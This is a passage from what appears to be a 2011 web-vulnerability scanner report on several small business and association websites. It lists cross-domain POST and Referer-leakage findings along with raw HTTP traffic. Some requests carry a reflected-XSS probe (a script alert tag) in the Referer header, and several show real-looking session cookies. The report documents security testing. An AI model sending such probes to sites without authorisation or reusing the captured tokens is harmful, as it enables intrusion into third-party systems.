Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.centrifugesystems.com/
Cookie: .ASPXANONYMOUS=ak3aKqwvzQEkAAAAMTRmYzcwNTctMjkxNy00NTIyLWI3MjYtZjUyY2NjM2E1NGZj0; hubspotutk=e508d7f7-4d7c-4017-9137-bc530b45f2fc; HUBSPOT140=2064716972.0.0000

Response 1

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 19:28:03 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://signup.hubspot.com/setup/billing?portalId=18225&redirectToNewPortalDomain=http%3a%2f%2fwww.centrifugesystems.com%2f
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 244

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://signup.hubspot.com/setup/billing?portalId=18225&amp;redirectToNewPortalDomain=http%3a%2f%2fwww.centrifugesystems.com%2f">here</a>.</h2>
</body></html>

Request 2

GET /Inactive.aspx?type=18 HTTP/1.1
Host: centrifugesystems.app101.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: .ASPXANONYMOUS=ak3aKqwvzQEkAAAAMTRmYzcwNTctMjkxNy00NTIyLWI3MjYtZjUyY2NjM2E1NGZj0; hubspotutk=e508d7f7-4d7c-4017-9137-bc530b45f2fc; HUBSPOT140=2064716972.0.0000

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 19:28:05 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://signup.hubspot.com/setup/billing?portalId=18225&redirectToNewPortalDomain=http%3a%2f%2fcentrifugesystems.app101.hubspot.com%2fDefault.aspx%3fapp%3dSiteCentral%26ui%3dhubdashboard
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 307

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://signup.hubspot.com/setup/billing?portalId=18225&amp;redirectToNewPortalDomain=http%3a%2f%2fcentrifugesystems.app101.hubspot.com%2fDefault.aspx%3fapp%3dSiteCentral%26ui%3dhubdashboard">here</a>.</h2>
</body></html>
22.2. http://www.hartfordbusiness.com/phpAds/adjs.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hartfordbusiness.com
Path:   /phpAds/adjs.php

Request 1

GET /phpAds/adjs.php?n=JZGRPSC8&what=zone:12&block=1&exclude=,&referer=http%3A//burp/show/17 HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd; __utma=231841670.1564481969.1305247369.1305247369.1305247369.1; __utmb=231841670.1.10.1305247369; __utmc=231841670; __utmz=231841670.1305247369.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17

Response 1

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:42:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=30fd5f0f23a90b1cf3e911d684cc4aba; expires=Sat, 12-May-2012 00:42:50 GMT; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Length: 1240
Connection: close
Content-Type: text/javascript; charset=UTF-8

var OX_348a644b = '';
OX_348a644b += "<"+"a href=\'http://www.hartfordbusiness.com/phpAds/www/delivery/ck.php?oaparams=2__bannerid=445__zoneid=12__cb=9391fe37fd__oadest=http://www.tempsnow.jobs/About.html\' target=\'_blank\'><"+"img src=\'http://www.hartfordbusiness.com/phpAds/www/delivery/ai.php?filename=tempsnow_half_011810.gif&contenttype=gif\' width=\'234\' height=\'60\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_9391fe37fd\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.hartfordbusiness.com/phpAds/www/delivery/lg.php?bannerid=445&amp;campaignid=138&amp;zoneid=12&amp;channel_ids=,&amp;loc=http%3A%2F%2Fwww.hartfordbusiness.com%2Fnews14300.html8d3ba%22%3E%3Cscript%3Ealert%28%22GHDB%22%29%3C%2Fscript%3E22db1e31600&amp;referer=http%3A%2F%2Fburp%2Fshow%2F17&amp;cb=9391fe37fd\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"script type=\'text/javascript\'>document.context=\'Yjo0NDV8\'; <"+"/script>\n";
document.write(OX_348a644b);

if (document.OA_used) document.OA__used += 'bannerid:445,';

if (document.MAX_used) document.MAX_used += 'bannerid:445,';

if (document.phpAds_used) document.phpAds_used += 'bannerid:445,';

Request 2

GET /phpAds/adjs.php?n=JZGRPSC8&what=zone:12&block=1&exclude=,&referer=http%3A//burp/show/17 HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd; __utma=231841670.1564481969.1305247369.1305247369.1305247369.1; __utmb=231841670.1.10.1305247369; __utmc=231841670; __utmz=231841670.1305247369.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17

Response 2

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:42:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=8e0b85659dcc95acc5888e5fe88e34f1; expires=Sat, 12-May-2012 00:42:51 GMT; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Length: 1107
Connection: close
Content-Type: text/javascript; charset=UTF-8

var OX_ef139a2b = '';
OX_ef139a2b += "<"+"a href=\'http://www.hartfordbusiness.com/phpAds/www/delivery/ck.php?oaparams=2__bannerid=445__zoneid=12__cb=ede617f91b__oadest=http://www.tempsnow.jobs/About.html\' target=\'_blank\'><"+"img src=\'http://www.hartfordbusiness.com/phpAds/www/delivery/ai.php?filename=tempsnow_half_011810.gif&contenttype=gif\' width=\'234\' height=\'60\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_ede617f91b\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.hartfordbusiness.com/phpAds/www/delivery/lg.php?bannerid=445&amp;campaignid=138&amp;zoneid=12&amp;channel_ids=,&amp;referer=http%3A%2F%2Fburp%2Fshow%2F17&amp;cb=ede617f91b\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"script type=\'text/javascript\'>document.context=\'Yjo0NDV8\'; <"+"/script>\n";
document.write(OX_ef139a2b);

if (document.OA_used) document.OA__used += 'bannerid:445,';

if (document.MAX_used) document.MAX_used += 'bannerid:445,';

if (document.phpAds_used) document.phpAds_used += 'bannerid:445,';
22.3. http://www.sheehan.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sheehan.com
Path:   /

Request 1

GET / HTTP/1.1
Host: www.sheehan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Sheehan+Phinney&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:02:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vywouliufmfaij55bernrsy0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Attorneys at Law : Sheehan Phinney Bass + Green PA : New England Law Firm : Manchester, NH : Boston, MA : Concord, NH : Hanover, NH</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/styles/sheehan.css" rel="stylesheet" type="text/css">
<script language="javascript" src="/js/functions.js"></script>
<script language="javascript" src="/js/email-popup.js"></script>
<script language="javascript" src="/js/transmenu_function.js"></script>
<script language="javascript" src="/js/transmenu.js"></script>
<link rel="stylesheet" type="text/css" href="/styles/transmenu.css" />

<link rel="stylesheet" href="/sifr/sIFR-screen.css" type="text/css" media="screen" />

<script src="/sifr/sifr.js" type="text/javascript"></script>
<script type="text/javascript" src="/sifr/sifr-format.js"></script>

</head>
   <body onload="init();emailInit();" style="margin:0px 0px 0px 0px">
       <table width="900" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td>
    <div id="container">
<table width="890" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td width="296" height="100" valign="top"><a href="/"><img src="/images/common/logo.gif" alt="Sheehan Phinney Bass + Green" border="0"></a></td>
<td align="center" width="296">
       <form action="/search.aspx" name="search">
       <table width="130" border="0" cellspacing="0" cellpadding="2">
<tr>
<td align="left" colspan="2"><img src="/images/common/search.gif" border="0"></td>
</tr>
<tr>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.sheehan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:02:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Attorneys at Law : Sheehan Phinney Bass + Green PA : New England Law Firm : Manchester, NH : Boston, MA : Concord, NH : Hanover, NH</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/styles/sheehan.css" rel="stylesheet" type="text/css">
<script language="javascript" src="/js/functions.js"></script>
<script language="javascript" src="/js/email-popup.js"></script>
<script language="javascript" src="/js/transmenu_function.js"></script>
<script language="javascript" src="/js/transmenu.js"></script>
<link rel="stylesheet" type="text/css" href="/styles/transmenu.css" />

<link rel="stylesheet" href="/sifr/sIFR-screen.css" type="text/css" media="screen" />

<script src="/sifr/sifr.js" type="text/javascript"></script>
<script type="text/javascript" src="/sifr/sifr-format.js"></script>

</head>
   <body onload="init();emailInit();" style="margin:0px 0px 0px 0px">
       <table width="900" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td>
    <div id="container">
<table width="890" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td width="296" height="100" valign="top"><a href="/"><img src="/images/common/logo.gif" alt="Sheehan Phinney Bass + Green" border="0"></a></td>
<td align="center" width="296">
       <form action="/search.aspx" name="search">
       <table width="130" border="0" cellspacing="0" cellpadding="2">
<tr>
<td align="left" colspan="2"><img src="/images/common/search.gif" border="0"></td>
</tr>
<tr>
<td><input name="kw" type="text" class="ipSmall"></td>

...[SNIP]...
22.4. http://www.wi-ala.org/clubportal/loginretrieval.cfm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wi-ala.org
Path:   /clubportal/loginretrieval.cfm

Request 1

GET /clubportal/loginretrieval.cfm?clubID=177 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination.&username=
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D5%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.9.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A37%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D10%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:37 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<input type="hidden" name="pgsrc" value="http://www.wi-ala.org/clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination.&username=" />
               
                <tr>
<td width="125" align="right" valign="middle">
                   <strong>Your Email Address:</strong>
                   </td>
<td valign="middle" align="left">
           <input name="profileemailaddress" id="profileemailaddress" type="text" size="30" />
</td>
</tr>
                <tr><td colspan="2">&nbsp;</td></tr>
                <tr>
                   <td colspan="2" align="left" id="mize_tipblock">For security purposes, please enter the characters you see below.</td>
                </tr>
                <tr>
                   <td width="125" align="right" valign="middle">
                   <img src="images/gui/securityimgs/FG58EB6.jpg" alt="Memberize.com login security" align="middle">
                   </td>
<td valign="middle" align="left">
           <input name="SecurityImgString" id="SecurityImgString" type="text" maxlength="5" size="15" />&nbsp;<span class="fineprint">This will not be part of your new login information.</span>
</td>
                </tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="Submit" value="Submit"> <input type="Reset" value="Reset">
</td>
</tr>
                </form>

</table>
           </td>
</tr>
   </table>
   </td>
   </tr>
</table>

   </td>
   </tr>
    </table>


</td>
</tr>
</table>



</td>






</tr>
</table>

</div>





   
   
   
   
   
   <div id="mize_footerdiv">
   <div id="mize_footerinnerdiv">
   
   
   <table class="footertable" border="0" cellspacing="0" cellpadding="0">
   
   <tr>
   <td>
   
       <table cellspacing="0" cellpadding="0" width="100%" align="center" bgcolor="#b1afb0" border="0">
<tbody>
<tr>
<td align="center" width="800">
<table cellspacing="0" cellpadd
...[SNIP]...

Request 2

GET /clubportal/loginretrieval.cfm?clubID=177 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D5%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.9.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D6%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<input type="hidden" name="pgsrc" value="" />
               
                <tr>
<td width="125" align="right" valign="middle">
                   <strong>Your Email Address:</strong>
                   </td>
<td valign="middle" align="left">
           <input name="profileemailaddress" id="profileemailaddress" type="text" size="30" />
</td>
</tr>
                <tr><td colspan="2">&nbsp;</td></tr>
                <tr>
                   <td colspan="2" align="left" id="mize_tipblock">For security purposes, please enter the characters you see below.</td>
                </tr>
                <tr>
                   <td width="125" align="right" valign="middle">
                   <img src="images/gui/securityimgs/JKP36F4.jpg" alt="Memberize.com login security" align="middle">
                   </td>
<td valign="middle" align="left">
           <input name="SecurityImgString" id="SecurityImgString" type="text" maxlength="5" size="15" />&nbsp;<span class="fineprint">This will not be part of your new login information.</span>
</td>
                </tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="Submit" value="Submit"> <input type="Reset" value="Reset">
</td>
</tr>
                </form>

</table>
           </td>
</tr>
   </table>
   </td>
   </tr>
</table>

   </td>
   </tr>
    </table>


</td>
</tr>
</table>



</td>






</tr>
</table>

</div>





   
   
   
   
   
   <div id="mize_footerdiv">
   <div id="mize_footerinnerdiv">
   
   
   <table class="footertable" border="0" cellspacing="0" cellpadding="0">
   
   <tr>
   <td>
   
       <table cellspacing="0" cellpadding="0" width="100%" align="center" bgcolor="#b1afb0" border="0">
<tbody>
<tr>
<td align="center" width="800">
<table cellspacing="0" cellpadding="4" border="0" style="width: 142px; color: rgb(255,255,255); height: 25px">
<tbody>

...[SNIP]...
23. Cross-domain POST  previous  next
There are 2 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

23.1. http://baxterhall.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://baxterhall.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain baxterhall.us1.list-manage.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: baxterhall.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:44:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=b99e9c47%2Dd25f%2D494e%2D9dc2%2D4c7b8f84071b; domain=baxterhall.com; path=/; expires=Sat, 11-May-2041 02:36:12 GMT
Set-Cookie: CFTOKEN=0; domain=baxterhall.com; path=/; expires=Sat, 11-May-2041 02:36:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10450


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="
...[SNIP]...
</p>
    <form action="http://baxterhall.us1.list-manage.com/subscribe/post?u=af99ddc06514156d3fc2b8b2e&amp;id=ac212b1ab8" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank">

    <p>
...[SNIP]...
23.2. http://www.rtacpa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rtacpa.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.envoymessaging.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.rtacpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/url?sa=t&source=web&cd=1&ved=0CB0QFjAA&url=http%3A%2F%2Fwww.rtacpa.com%2F&rct=j&q=reedtinsley&ei=Gy_MTZmgEOO_0AGh8aD2Bg&usg=AFQjCNEw7aDzOBKqm1WipAAg6_m5llEGNw&cad=rja

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:04:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=4636a284%2D6636%2D4962%2Da561%2Dec52c395e37d; domain=www.rtacpa.com; path=/; expires=Sat, 11-May-2041 02:55:40 GMT
Set-Cookie: CFTOKEN=0; domain=www.rtacpa.com; path=/; expires=Sat, 11-May-2041 02:55:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 16030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<div class="sign_up">
<form action="http://www.envoymessaging.com/eletra/mod_input_proc.cfm" method="post">
<input value="rtacpa" name="XXDESXXuser" type="hidden">
...[SNIP]...
24. Cross-domain Referer leakage  previous  next
There are 47 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

24.1. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2;sz=180x300;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 451
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 13 May 2011 00:42:54 GMT
Expires: Fri, 13 May 2011 00:42:54 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b06/0/0/%2a/r;240721923;0-0;0;63426416;6249-180/300;42018362/42036149/2;;~sscs=%3fhttp://switchtopeoplesunited.com"><img src="http://s0.2mdn.net/viewad/2810457/PNB_Delighting_180x300.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
24.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 457
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 13 May 2011 00:42:59 GMT
Expires: Fri, 13 May 2011 00:42:59 GMT
Discarded: true

